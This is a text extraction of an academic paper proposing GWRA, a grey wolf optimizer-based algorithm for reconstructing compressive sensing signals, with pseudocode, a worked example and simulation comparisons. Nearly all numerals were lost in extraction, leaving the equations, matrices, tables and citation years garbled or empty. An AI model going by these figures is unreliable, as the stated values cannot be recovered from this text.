proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice gwra: grey wolf based reconstruction algorithm for compressive sensing signals gwra: grey wolf based reconstruction algorithm for compressive sensing signals ahmed aziz , karan singh , ahmed elsawy , walid osamy and ahmed m. khedr computer science department, faculty of computers and artificial intelligence, benha university, benha, egypt school of computer and systems sciences, jawaharlal nehru university, new delhi, delhi, india department of computer science, university of sharjah, sharjah, uae, united arab emirates abstract the recent advances in compressive sensing (cs) based solutions make it a promising technique for signal acquisition, image processing and other types of data compression needs. in cs, the most challenging problem is to design an accurate and efficient algorithm for reconstructing the original data. greedy-based reconstruction algorithms proved themselves as a good solution to this problem because of their fast implementation and low complex computations. in this paper, we propose a new optimization algorithm called grey wolf reconstruction algorithm (gwra). gwra is inspired from the benefits of integrating both the reversible greedy algorithm and the grey wolf optimizer algorithm. the effectiveness of gwra technique is demonstrated and validated through rigorous simulations. the simulation results show that gwra significantly exceeds the greedy-based reconstruction algorithms such as sum product, orthogonal matching pursuit, compressive sampling matching pursuit and filtered back projection and swarm based techniques such as ba and pso in terms of reducing the reconstruction error, the mean absolute percentage error and the average normalized mean squared error. subjects artificial intelligence, computer networks and communications, network science and online social networks keywords average normalized mean squared error, compressive sensing, greedy-based reconstruction algorithm, grey wolf optimizer, mean absolute percentage error, reconstruction algorithms introduction exploiting the sparse nature of the signals is highly challenging in various signal processing applications such as signal compression, inverse problems and this motivated the development of compressive sensing (cs) methodologies (donoho, ). cs provides an alternative new method of compressing data, offering a new signal sampling theory which we can adopt in variety of applications including data and sensor networks (cevher & jafarpour, ), medical systems, image processing and video camera, signal detection, analog-to-digital convertors (choi et al., ) and several other applications. the cs reconstruction problems are solved by convex algorithms and greedy algorithms (gas). convex algorithms are not efficient because they require high complex computations. thus, most of researchers choose gas, which are faster and give the same performance as convex algorithms in terms of minimum reconstruction error. on the other hand, gas do how to cite this article aziz a, singh k, elsawy a, osamy w, khedr am. . gwra: grey wolf based reconstruction algorithm for compressive sensing signals. peerj comput. sci. :e doi . /peerj-cs. submitted march accepted july published september corresponding author ahmed aziz, ahmed.aziz@fci.bu.edu.eg academic editor xiangjie kong additional information and declarations can be found on page doi . /peerj-cs. copyright aziz et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ahmed.�aziz@�fci.�bu.�edu.�eg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ not give a global solution as all heuristics algorithms that execute blind search and usually stuck on local optima. in this paper, we use grey wolf optimizer (gwo), which is considered as a meta heuristic algorithm that is prominent in finding global solution. only a few works involving swarm algorithms have been proposed to solve cs reconstruction problem such as in bao et al. ( ) and du, cheng & liu ( ) where the authors used bat and pso algorithms to reconstruct the cs data. however, these two algorithms (bao et al., ; du, cheng & liu, ) have a number of drawbacks such as slow convergence velocity and tend to fall in local optimum status easily. in contrast, the gwo algorithm showed better performance than other swarm optimization algorithms (mirjalili, mohammad mirjalili & lewis, ). problem formulation consider x[n], where n = , : : : n, denotes sensor nodes reading vector set, n represents the count of sensor nodes. any individual signal in rn can be expressed using basis of n � vectors {�i}i= n . employing the basis n � n matrix, expressed as =[� |� |� |....|�n], together with the vectors �i being the columns, we can represent the signal x as given below (donoho, ): x ¼ xn i¼ gi �i: ( ) this representation is done in terms of n � n orthonormal basis transform matrix. here, g denotes the n � sparse presentation of x. cs focuses on signals with a sparse representation. the number of basis vectors of x is s, such that s << n. also we have, (n - s) values of g are zeros and only s values are non-zeros. using eq. ( ), the compressed samples y (compressive measurements) can be obtained as: y ¼ fx ¼ f�g ¼ ug: ( ) here, the compressed samples vector y ∈ rm, with m << n and θ is m � n matrix. the challenge of solving an undetermined set of linear equations have motivated the researchers to investigate upon this problem and as a result, diverse practical applications emerged to meet this challenge. in cs approach, the main responsibility is to offer an efficient reconstruction method enabling the recovery of the large and sparse signal with the help of a few available measurement coefficients. the reconstruction of signal using this available incomplete set of measurements is really challenging and relies on the sparse representation of signal. an easiest approach for recovering the original inherent sparse signal using its small set of linear measurements as shown in eq. ( ) is to compute the number of non-zero entries obtained by solving ‖l‖ minimization problem. the reconstruction problem can thus be expressed as x ¼ arg min xk k subject to y ¼ fx ( ) the ‖l‖ minimization problem works well in theoretical aspects, but in general, it is an np-hard problem (mallat & wavelet, ; candes & tao, ) and hence eq. ( ) is computationally intractable for any vector or matrix. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the main task involved in cs is to reconstruct the compressed sparsely sampled signal, involving solutions to an undetermined set of linear equations, with undefined set of solutions. therefore, an efficient reconstruction algorithm is required to recover the inherent sparse signal. main aim of signal reconstruction procedure is to evaluate the possible solutions derived from the inverse equation defined above so that it is possible to find the most appropriate estimate of the original sparse signal. the original signal reconstruction problem can be viewed as an optimization problem and numerous algorithms have been proposed with this intention. according to the cs method, the reconstruction algorithms for recovering the original sparse signal can be broadly categorized into two types: (i) convex relaxation, (ii) ga. convex relaxation based optimization corresponds to a class of algorithms which make use of linear programming approach to solve the reconstruction problem. these techniques are capable of finding optimal/near optimal solutions to the reconstruction issues, but they have relatively high computational complexity. the examples for such algorithms are least absolute shrinkage and selection operator, basis pursuit and basis pursuit de-noising. in order to overcome the computational complexity of recovering the sparse signal, a family of ga/iterative algorithms have been introduced. ga solves the reconstruction problem in greedy/iterative fashion, with reduced complexity (chartrand & yin ). therefore, ga is more adoptable for signal reconstruction in cs. ga techniques are classified into two categories: (i) reversible, (ii) irreversible. both of them follows identical steps, detects the support-set making use of matched filter (mf) and after that constructs the original sparse signal using least squares (ls) method. in reversible ga, an element inserted to the support-set can be removed anytime, following a backward step. however, in irreversible ga, an element inserted to the support-set will remain there until the search ends. examples for reversible ga includes sum product (sp; dai & milenkovic, ), compressive sampling matching pursuit (cosamp; needell & tropp, ) etc., whereas orthogonal matching pursuit (omp; tropp & gilbert, ) belongs to the class of irreversible ga algorithms. the authors of mirjalili, mohammad mirjalili & lewis ( ) proposed a swarm intelligent technique, gwo, well tested with benchmark functions. the benchmark functions used are minimization functions and are divided into four groups: unimodal, multimodal, fixed-dimension multimodal and composite functions. the gwo algorithm is compared to pso as an si-based technique and gsa as a physics-based algorithm. in addition, the gwo algorithm is compared with three eas: de, fast evolutionary programing and evolution strategy with covariance matrix adaptation. the results showed that gwo is able to provide highly competitive results compared to well-known heuristics such as pso, gsa, de, ep and es. first, the results on the unimodal functions showed the superior exploitation of the gwo algorithm. second, the exploration ability of gwo is confirmed by the results on multimodal functions. third, the results of the composite functions showed high local optima avoidance. finally, the convergence analysis of gwo confirmed the convergence of this algorithm. finding the global optimum precisely requires balancing the exploration and exploitation (i.e., good equilibrium) and this balance can be achieved using gwo (faris et al., ). aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here, we propose a new grey wolf based reconstruction algorithm (gwra) for cs signal reconstruction. gwra algorithm is inspired from the gwo and the reversible ga. gwra has two forward steps (ga forward and gwo forward) and one backward step. during the first iteration, gwra matches filter detection to initialize the support set (ga forward step) and adds q elements to it. then, gwra increases the search space in this iteration by selecting extra k elements depending on gwo algorithm (gwo forward step) and then solves the ls equation to select the best k elements from q + k elements (backward step). summary of the contributions in this paper: . develop a novel reconstruction algorithm based on grey wolf optimizer (gwra) that: (a) utilizes the advantages of gas to initialize the forward steps and (b) utilizes the advantages of gwo algorithm that enlarges the search space to determine the optimal output and recover the data. . provide extensive experiments, and the subsequent results illustrate that gwra exhibit high performance results than the existing techniques in terms of reconstruction error. the rest of this paper is divided as follows: the related research of the proposed problem is described in the section “related research.” in the section “grey wolf optimizer background” presents the gwo background. then in section “grey wolf reconstruction based algorithm,” we introduce our method to solve the proposed problem with the illustration of a numerical example scenario. the simulation results of our approach and a case study scenario is given in the section “simulation results.” finally, the paper is concluded in the section “conclusion.” table explains the abbreviations which are used this manuscript. table shows the notations used throughout the paper. related research compressive sensing has become an attractive approach, convenient for use in internet of things (iot) platforms, which utilizes the sparse nature of sensor signals. the signal is compressed (reduce signal dimension) from n to m such that m << n, which will result in table the following abbreviations are used in this manuscript. cs compressive sensing iot internet of things mape mean absolute percentage error ga greedy algorithm anmse average normalized mean squared error cosamp compressive sampling matching pursuit omp orthogonal matching pursuit algorithm gwo grey wolf optimizer mp matching pursuit fbp filtered back projection sp sum-product algorithm bp basis pursuit aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ transmission of fewer samples, making it suitable for iot applications that hold continuous data. the main challenge in cs approach is to provide reconstructed signal with an acceptable quality. several reconstruction algorithms have been developed to meet this requirement. the convex reconstruction approach converts the problem defined in eq. ( ) to convex optimization problem, replacing non-convex l minimization problem with convex l , as defined in eq. ( ). x ¼ arg min xk k subject to y ¼ fx ( ) equation ( ) is then solved using the l -magic toolbox (davenport et al., ) or any such problem solvers or using any linear programming methods. although these techniques are capable of finding optimal/near optimal solutions to the reconstruction issues, the relatively high computational complexity make them inappropriate for iot applications. on the other hand, ga-based algorithms could be suitable for iot networks, as they solve the reconstruction problem with low computation and reduced complexity. in mallat & zhang ( ) matching pursuit algorithm (mp) is considered as the first ga based algorithm in which the support-set is initialized by the index of the largest table table of notations. notation description x original signal m number of measurements y compressed sample f cs matrix � transform matrix k signal sparsity level g sparse presentation of x r residual of y x wolf position xp prey position q number of selected columns by wolf algorithm xa a wolf position xβ β wolf position xd d wolf position r support set c search set c sub-matrix contains columns with indices c from matrix best best solution or xa secbest second best solution or xβ thirbest third best solution or xd f fitness value x′ estimated solution t number of iterations † pseudo-inverse l indices set of largest k magnitude entries in ’c yy aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ magnitude entries in ty, this step is called forward step and then it solves the ls problem. however, mp algorithm does not consider the non-orthogonality of the cs matrix which leads to incorrect selection to the columns corresponding to the non-zero values. this drawback has been solved by omp algorithm (tropp & gilbert, ). the omp algorithm selects the index of the largest magnitude entries in tr during each iteration, where r is the residual of y, and then solves the ls problem. different algorithms have been proposed based on omp algorithm as in donoho et al. ( ) and needell & vershynin ( ). in donoho et al. ( ), a faster and enhanced version of omp called stagewise omp (stomp) is proposed. stomp enhances the forward step of omp by selecting a number of columns, instead of one column as in omp, the magnitude values of the columns in tr are greater than a threshold and then uses these columns for solving the ls problem. in needell & vershynin ( ), in each iteration, the inner-products with similar magnitudes are grouped into sets and the maximum energy set is then selected. the above algorithms are classified as irreversible ga class, as they do not have a backward step. backward step allows the algorithm to remove the wrong selection of elements during the forward step, i.e., in these algorithms, once an element is inserted to the support-set this element remains there until the search ends. however, in reversible gas such as sp (dai & milenkovic, ), iht (cevher & jafarpour, ), cosamp (needell & tropp, ) and filtered back projection (fbp; burak & erdogan, ) algorithms, backward step is used to prune the wrong elements that have been added to the support-set during the forward step. in cosamp and sp, initialization of support-set is done by placing the indices of b largest-magnitude components of f′y. the size of b is different in each algorithm, for example, b = k in sp and b = k in cosamp where the value of sparsity level k is known. on the other hand, fbp (burak & erdogan, ) algorithm has the ability to perform without the knowledge of k. it assigns forward and backward step size depending on the measurements size. in cevher & jafarpour ( ), the iht algorithm considers iterative gradient search algorithm which updates the estimate-set depending on e gradient of the residue and keeps only the largest k entries by removing the wrong selection. even though ga based reconstruction have become significantly popular for recovery of cs signals, in general they do not provide optimal solution to the problem of cs reconstruction (du, cheng & chen, ). in bao et al. ( ), the authors utilized the efficiency of the swarm algorithm bat in finding the optimal solution of cs reconstruction problem. also, in du, cheng & liu ( ), pso algorithm is used for cs data reconstruction. the results showed that gwo is able to provide highly competitive results compared to well-known heuristics algorithms such as pso, gsa, de, ep and es (mirjalili, mohammad mirjalili & lewis, ). in contrast, the gwo algorithm displays better performance than other swarm optimization algorithms. here, we introduce a new technique (gwra), integrating the advantages of both ga and gwo in determining the optimal output for the desired problem of cs reconstruction. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grey wolf optimizer background grey wolf optimizer can be defined as an intelligent meta-heuristic approach, inspired by group hunting behavior of grey wolves (mirjalili, mohammad mirjalili & lewis, ). the gwo method simulates the social behavior and hierarchy of grey wolves and their hunting method. the hierarchal leadership divides the grey wolves into four categories: (i) alpha (a), (ii) beta (β), (iii) delta (d) and (iv) omega (v) as shown in fig. . the a grey wolves are principally the leaders of their strict dominant hierarchy, responsible and powerful for decision making and leads the whole group during hunting, feeding, migration etc. the subordinates of alpha wolves are called β wolves and they are placed on the second level of the grey wolves’ hierarchy. they act as advisors and help the alpha wolves in making decisions. finally, d wolves execute alpha and beta wolves’ decision and manage v wolves which are considered as the lowest ranking members of grey wolves hierarchy. in gwo, a, β and d guide the optimization process, where gwo considers the best solution and position for a wolves. in addition, the second and third best solutions and positions are assigned for β and d, respectively. the other solutions are called v solutions which always follow the solution of the other three wolves. the mathematical representation of surrounding the prey and hunting process in gwo algorithm can be modelled as follows: surrounding the prey in the hunting process, the first step of grey wolves is “surrounding the prey,” which can be expressed mathematically as: d ¼ cxp � x tð Þ �� �� ( ) x t þ ð Þ ¼ xp � ad ( ) equation ( ) expresses the distance between the wolf and the prey, where x is the wolf position, xp is the prey position, t denotes the current iteration and c is coefficient vector which can be calculated using eq. ( ). the wolf’s position is updated using eq. ( ), where a denotes the coefficient vector and it can be calculated using eq. ( ). c ¼ r ( ) a ¼ ar � a ( ) figure grey wolfs’ hierarchal leadership (faris et al., ). full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here, r and r are random values in [ , ] and the values of a’s linearly decrease from to in each iteration. gwo hunting process after surrounding prey process, a, β and d wolves lead the hunting process. during the hunting process, gwo preserves the first three best solutions (according to their fitness values) for a, β and d, respectively and according to the position of wolves a, β and d, the other search agents (v) estimates their positions. then, they start to attack the prey. the behavior of this process can be represented mathematically as in eqs. ( – ) (faris et al., ): da ¼ c xa � xj j; db ¼ c xb � x �� ��; dd ¼ c xd � xj j ( ) x ¼ xa � a da; x ¼ xb � a db; xd ¼ xd � a dd ( ) x t þ ð Þ ¼ x þ x þ x ( ) after updating the positions of all wolves, the hunting process starts the next iteration to find the new best three solutions and repeat this process until the stopping condition is satisfied. algorithm presents the gwo technique. grey wolf reconstruction based algorithm in this section, the proposed gwra is described. gwra can be used by the base station to reconstruct the sensors readings again. gwra algorithm is inspired from the gwo algorithm and the reversible ga. gwra has two forward steps (ga forward and gwo forward) and one backward step. in the first iteration, gwra starts like any ga by algorithm gwo algorithm : initialize the grey wolf population xi (i = , , , : : : ,n) and t = . : initialize c, a, and a using equations ( ) and ( ). : calculate the fitness of each search agent. : put the best search agent as xa, the second best search agent as xβ and the third best search agent as xd. : while (t < max number of iterations) : for each search agent : modify the current search position using equation ( ). : end for : update a, a, and c. : calculate the fitness of all search agents. : modify xa, xβ and xd. : t = t + . : end while : return xa. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ initializing the support-set r with q elements using mf detection (ga forward step). gwra increases the search space (search set c) by selecting extra k elements depending on gwo algorithm (gwo forward step). then, gwra solves the ls equation to select the best k elements from q + k elements (backward step). figure gwra algorithm flow chart. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at the end of this iteration, gwra updates the support-set r with these k elements. from the second iteration, gwra depends only on gwo forward step to select new k elements and add them to c, i.e., c has � k elements in search space in each iteration to select the best k elements till it reaches the maximum number of iterations. flow chart of gwra is shown below in fig. . the difference between gwra and the other reversible ga like cosamp (needell & tropp, ) and sp (dai & milenkovic, ) algorithm is that in each iteration, gwra uses the strength of gwo algorithm to find the best k according to their fitness values that leads the search toward the optimal solution. gwra consists of two phases: initialization and reconstruction, as described below. initialization phase grey wolf reconstruction algorithm performs the following initialization in this phase: [ ]. initialize the support-set r with indices of t columns that corresponds to the largest q magnitude components in h, where h = ty. [ ]. initialize the size of q to m/ - k depending on the fact “cs reconstruction problem can be resolved if the sparsity level k � m/ ” [ ]. initializations [ ] and [ ] will be executed only once at the beginning of the gwra. [ ]. represent the search agents (wolves) positions as matrix xi � j, where i = number of wolves and j = k. each value of this matrix is a randomly selected integer [ , n], where n denotes the count of columns in , where each number represents an index of a column in f without duplication. [ ]. initialize xa, xβ and xd as vector � k all of its components equal to s. [ ]. initialize best = secbest = thirbest = infinity. [ ]. initialize outer-loop iteration t = . [ ]. initialize the stopping threshold ε = - . [ ]. initialize the estimated solution x′ = ø. reconstruction phase the details of the reconstruction phase are described as given below: [ ]. for each row i in matrix x do the following: a. create the search set c, where c = r ∪ {row #i of xi � j}. b. create the sub-matrix c from the cs matrix f. c includes the columns corresponding to the indices in c. c. create the set i as the k indices in c that have largest amplitude components of c †y. d. create sub-matrix l = fi, the columns of matrix f that corresponds to indices in set i (backward step). e. calculate the fitness value f(l), gwra uses the same fitness function in du, cheng & chen ( ) which can be expressed as follows: f lð Þ ¼ llyy � yk �� ( ) aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ f. if best > f(l), then best = f(l) and xa = i. g. otherwise if best < f(l) and secbest > f(l), then secbest = f(l) and xβ = i. h. otherwise if best < f(l), secbest < f(l) and thirbest > f(l), then thirbest = f(l) and xd = i. i. set r = i. [ ]. updating wolves position: this step updates each search agent’s position according to eq. ( ). the matrix x is updated according to the new position of xa, xβ and xd. [ ]. in order to keep the values of matrix x as integer values between [ , n], we modified eq. ( ) as follows: x t þ ð Þ ¼ ceil mod x þx þx ; n � �� � ( ) [ ]. check if t (the number of iterations) is less than the maximum count of iterations tmax or best > ε where ε = - , then t = t + and go to [ ] else stop and return x′ where x′i = l †y and x′s-i = where s = [ , : : : n]. algorithm presents the gwra algorithm. example scenario for clarification, we illustrate the actions of gwra using the following example: input: matrix f � (m = and n = ) with elements generated from uniform distribution, y = fx ∈ r is the compressed samples and the sparsity level k = . output: estimated signal x′. f � ¼ : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : bbbbbbbb@ cccccccca ; y ¼ : : : : : : ; x ¼ : : aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ initialization phase execution . support-set r = { }, the indices of columns of f that correspond to the largest q(= ) amplitude components in h = ty, where q ¼ m= � k ¼ . algorithm gwra : input: cs matrix fm � n, measurement vector y and sparsity level k. : output: estimated solution set x′: initialization phase: : r ≜ {indices of the q largest magnitude entries in ty}. : initialize the grey wolf population matrix xi � k with random integers between [ , n]. : xa = zeros ( , k), xβ = zeros ( , k), xd = zeros ( , k). : best = secbest = thirbest = ∞. : x′ = ø, ε = - and t = . reconstruction phase: : while (t < tmax||best > ε) : for each row i of the matrix xi � k do : c = union(r, row #i of xi � j) : i ≜ {indices of the k largest magnitude entries in c † y}. : l = i. : calculate the fitness value f(l) using equation . . if(best > f(l)), then : xa = i, : else if (best < f(l) && secbest > f(l)), then : secbest = f(l) and xβ = i. : else if (best < f(l) && secbest < f(l) && thirbest > f(l)), then : thirbest = f(l) and xd = i. : end if : set r = i. : end for : wolf positions updating step: : update a, a, and c : for each search agent : update the position of the current search agent by equation ( ). : end for : t = t + : end while : return x′ where x′i = l †y and x′s-i = l †y where s = [ , : : : n]. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ h ¼ : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : : bbbbbbbb@ cccccccca t : : : : : : ¼ : : : : : : : : : : . matrix xi � k, where i = number of search agents (= ) and k = , will be initialized as follows: x � ¼ bbbb@ cccca . initialize xa, xβ and xd as xa = [ ], xβ = [ ] and xd = [ ]. best = secbest = thirbest = ∞. number of the outer-loop iteration is initialized to t = and the estimated solution x′ = ø. reconstruction phase execution . for each row i in the matrix do: when i = ○ c ¼ r [ frow of x � g ¼ f ; ; g; ○ create the sub-matrix fc by selecting the columns from f which correspond to the indices in c. ϕc ¼ ; ; f g ¼ : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ○ the set i will be created as the indices of the largest k(= ) amplitude components in fc †y: ϕc ¼ ; ; f g yy ¼ : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca y : : : : : : ¼ : : : i.e., i = { , }. and then we create the sub-matrix l ¼ ϕi ¼ : : : : : : : : : : : : bbbbbb@ cccccca ○ using eq. ( ), the fitness value f(l) of the sub-matrix will be . . ○ since best > f(l), best = . , xa = { , }. . repeating the same steps for all rows (i = , , , ) of x, we will have best = . , xa = i = { , }. r will be updated as r = i = { , }. . using eq. ( ), the updated position matrix x will be: x � ¼ bbbb@ cccca . since the stop criteria are not satisfied, the iteration number will be updated t = t + and execute reconstruction phase as follows: for each row i in the matrix do: (when i = ) ○ c = r ∪ {row in x} = { , , , }, ○ create the sub-matrix fc by selecting the columns from matrix f that correspond to indices in c. ϕc ¼ ; ; ; f g ¼ : : : : : : : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ○ create the set i as the indices of the largest k amplitude components in ϕc yy: ϕc yy ¼ : : : : : : : : : : : : : : : : : : : : : : : : bbbbbb@ cccccca y : : : : : : ¼ : : : : : i.e., i = { , }. ○ the sub-matrix l will be: l ¼ fi ¼ : : : : : : : : : : : : bbbbbb@ cccccca ○ using eq. ( ), the fitness value f(l) of the sub-matrix l will be - . ○ since best > f(l), then best = - , xa = { , }. . repeating the same steps for every row of x (i = , , , ) in the wolf position matrix x, we will have best = - , xa = { , }, and updated r = i = { , }. . update each search agent’s position (matrix x) according to eq. ( ): x � ¼ bbbb@ cccca . according to the stop criteria best < - , stops and calculates x′ as following: x i¼ ; f g ¼ lyy ¼ : : : : : : : : : : : : bbbbbbbb@ cccccccca : : : : : : ¼ : : � � and then set x s�i ¼ ; ; ; ; ; ; ; f g ¼ : aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ then, the estimated signal x′ will be as follows: x ¼ : : which is equals to x. therefore, gwra succeeds to reconstruct the original data without any errors. simulation results in this section, the matlab environment is used for performing all simulations and the reconstruction is investigated by gaussian matrix f, of size m � n, where m = and n = . two types of data are used to evaluate the reconstruction performance of the proposed algorithm: computer generated data and real data set. in the first type, we used data generated from uniform and gaussian distribution as an example to evaluate the proposed algorithm. the whole process is repeated over times and then averaged on randomly generated k sparse samples. the performance evaluation of gwra and its comparison with the baseline algorithms such as cosamp (needell & tropp, ), omp (tropp & gilbert, ), sp (dai & milenkovic, ), fbp (burak & erdogan, ), ba (bao et al., ) and pso (du, cheng & liu, ) in terms of both average normalized mean squared error (anmse) and mean absolute percentage error (mape) is given below. the setting of used parameters is shown in table . performance metrics: the gwra algorithm reconstruction’s performance is compared with different reconstruction algorithms in terms of the following performance metrics: . average normalized mean squared error: the average ratio x�x =x defines the anmse, where x represents the initial reading and x′ represents the reconstructed one. . mean absolute percentage error: the ratio p x�x x �� ��� n defines the mape. average normalized mean squared error evaluation the gwra algorithm is evaluated in terms of anmse and the result is compared with the existing algorithms. figure illustrates the results of anmse evaluation in which gaussian distribution is used to generate the non-zero entries of the sparse signal. the results prove that gwra algorithm provides reduced anmse than cosamp, omp, fbp, ba, pso and sp. also, the anmse of gwra starts to increase only when k > while it increased when k > , k � , k � , k � , k � , k � for cosamp, omp, fbp, sp, ba, pso, respectively as shown in fig. . this is because gwra applies the grey wolves’ behavior to hunt the prey (k elements) inside search space (cs matrix) according to their fitness values (the best fitness values). then, in each iteration, the support-set will be updated with the best k elements, i.e., gwra has the best-estimated solution till it reaches the optimal one. aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure illustrates the results of anmse evaluation in which uniform distribution is used to generate the non-zero entries of the sparse signal. the results prove that gwra algorithm still gives the lowest anmse value than cosamp, fbp, omp, sp, ba, pso as k > , k � , k > , k > , k > , k � , k > , respectively, because what any ga does in one round, gwra does it for each search agent and then it selects the best one in every iteration to converge at the optimal solution. in the second test, we measure the reconstruction performance of gwra as a function in terms of the length of measurement-vector and then compared the results using cosamp, fbp, sp, ba, omp, pso. the sparse signals are generated using gaussian distribution having length n = , m values varying from to with increment of . illustration of the reconstruction performance of gwra, cosamp, omp, fbp, sp, ba and pso with different measurement vector length, m is given in fig. . from the figure, we observe that gwra algorithm still gives the lowest anmse results compared to the others. in the third test, reconstruction performance of gwra is measured in terms of anmse as a function of compression ratio over uniform and gaussian sparse vectors as figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms over generated gaussian sparse vector. full-size doi: . /peerj-cs. /fig- table parameters setting. parameter value signal length (n) measurement vector length (m) cs matrix (f) � sparse level (k) from to with five increment search agents matrix xi � j i = , j = k compression ratio %, %, %, % and % aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ shown in fig. and table , respectively. in this test, we have n = and the different compression ratios are %, %, %, % and % where k = m/ . figure shows the anmse for gwra, cosamp, omp, fbp, sp, ba and pso for different compression ratios. from fig. , we can conclude that gwra algorithm achieves the best reconstruction performance with different compression ratio. the same performance can be noted from table , where gwra achieves the minimum reconstruction error in comparison to the other algorithms for different compression ratio values. figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms over generated gaussian matrix with different lengths of m. full-size doi: . /peerj-cs. /fig- figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms over generated uniform sparse vector. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table anmse for different compression ratios over generated gaussian sparse vector. compression ratio (%) gwra cosamp omp fbp sp ba pso . e- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . figure anmse in gwra, cosamp, omp, fbp, sp, ba and pso algorithms for different compression ratios. full-size doi: . /peerj-cs. /fig- figure mape over sparsity for uniform sparse vector in gwra, cosamp, omp, fbp, sp, ba and pso. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mean absolute percentage error evaluation in the fourth test, we measure the reconstruction performance of gwra in terms of mape and the result is compared with other algorithms. figure shows mape results for gwra, cosamp, omp, fbp, sp, ba, pso algorithms and it is clear that gwra exceeds the reconstruction performance of others in terms of reducing the mape, because gwra integrates the advantages of both greedy as well as the gwo algorithm to achieve the best result. case study here, we demonstrate the effectiveness of the gwra algorithm introduced in this paper in reducing anmse and mape. for this purpose, the proposed algorithm is applied figure weather trace in dct domain: (a) the original data and (b) the sparse signal representation. full-size doi: . /peerj-cs. /fig- figure weather trace in fft domain: (a) the original data and (b) the sparse signal representation. full-size doi: . /peerj-cs. /fig- aziz et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to reconstruct real weather dataset (ali, gao & mileo, ). this dataset contains weather observations of aarhus city, denmark obtained during february–june and also august–september . in this test, we use the weather dataset of february period as original data. using cs, february dataset is compressed, then we apply, evaluate and compare the performance of gwra, cosamp, omp, fbp, lp (pant, lu & antoniou, ) and sp to recover it back. in addition, we use dct (duarte-carvajalino & sapiro, ) and fft (canli, gupta & khokhar, ) as sparse domain, as shown in figs. and . figure shows the anmse of gwra, cosamp, omp, fbp, lp and sp using dct domain. it is clear that gwra achieves the great performance in reducing anmse than other algorithms in case of using dct as a signal transformer. figure shows that using 